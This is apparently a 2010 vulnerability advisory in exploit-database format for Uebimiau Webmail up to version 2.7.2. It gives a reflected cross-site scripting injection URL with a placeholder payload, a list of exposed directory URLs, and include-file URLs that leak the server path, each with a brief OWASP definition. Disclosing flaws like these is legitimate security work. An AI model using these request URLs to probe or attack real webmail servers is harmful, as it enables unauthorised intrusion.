# Exploit Title: Uebimiau Webmail <= 2.7.2 Multiple Vulnerabilities. # Date: 13/03/10 # Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il # Software Link: http://www.uebimiau.org/ # Version: <= 2.7.2 # Tested on: PHP # ##[Cross Site Scripting] Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. (OWASP) # http://[SERVER]/webmail/index.php?lid=en_US&tid=clean&f_user=&six=3&f_email=[YOUR_XSS_HERE] # # ##[Directory Listing:] # http://[SERVER]/webmail/inc http://[SERVER]/webmail/images/ http://[SERVER]/webmail/extra/ http://[SERVER]/webmail/themes/ http://[SERVER]/webmail/smarty # ##[Full Path Disclosure:] Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP) # The following pages require files without checking if they exist. loading them will return a Fatal Errors and Warnings ("No such file or directory") with includes their Full-Path: # http://[SERVER]/webmail/inc/class.uebimiau.php http://[SERVER]/webmail/inc/class.uebimiau_mail.php http://[SERVER]/webmail/inc/config.php http://[SERVER]/webmail/inc/inc.php http://[SERVER]/webmail/smarty/Smarty_Compiler.class.php http://[SERVER]/webmail/smarty/plugins/function.html_select_date.php http://[SERVER]/webmail/smarty/plugins/function.html_select_time.php http://[SERVER]/webmail/smarty/plugins/modifier.date_format.php # # [e0f]